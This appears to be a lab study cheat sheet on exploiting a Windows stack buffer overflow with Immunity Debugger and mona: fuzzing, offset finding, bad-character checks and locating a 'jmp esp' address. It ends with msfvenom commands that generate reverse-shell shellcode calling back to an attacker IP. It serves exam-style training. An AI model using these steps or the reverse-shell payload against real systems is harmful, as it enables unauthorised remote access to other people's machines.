Buffer Overflow
Steps
Run Immunity Debugger
Open exe file or attach the service
Set mona configuration for the working directory
!mona config -set workingfolder c:\mona\%pPress play button
Try to connect with the server
nc $IP <port>Immunity Debugger would tell you the port which service are listening.
Fuzzing until crash and check byte number of crash.
Generate the pattern with some script program and send it like sending fuzzer. ( length of pattern --> <number of crash + 200>
Check offset with mona or other tool.
!mona findmsp -distance <length of pattern>or using the website with just input the EIP address.
[Optional] check EIP with BBBB
Set bytearray mona (make sure you have been set working directory)
!mona bytearray -b "\x00"Create badchar "\x00" with python script
Send badchar and compare it with mona on the ESP Address
!mona compare -f C:\mona\oscp\bytearray.bin -a <esp address>How to note badchar:
00 is always badchar
The second char is badchar
The third char is affected by the second char, so not a badchar
The fourth char is badchar
The fifth char is affected by fourth char so not a badchar
and so on
Test bad char, if mona Memory comparison result shows "unmodified" then your badchars are correct.
Search module for jmp esp, because you just could control EIP and put payload on ESP, you you need to control EIP and put command "jmp esp", it mean always jumping the running code to ESP (your payload)
!mona jmp -r esp -cpb "<bad chars>"
# example
!mona jmp -r esp -cpb "\x00\x11\x40\x5f\xb8\xee"
Get the module address of jmp esp, and write it reverse
# example
0x62501203
module_address = "\x03\x12\x50\x62"Generate payload
# msfvenom script
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=1337 EXITFUNC=thread -b "<badchars>" -a x86 -f c -v shellcode
# example
msfvenom -p windows/shell_reverse_tcp LHOST=10.4.1.97 LPORT=11111 EXITFUNC=thread -b "\x00\x11\x40\x5f\xb8\xee" -a x86 -f c -v shellcodeLAB - Buffer Overflow
Last updated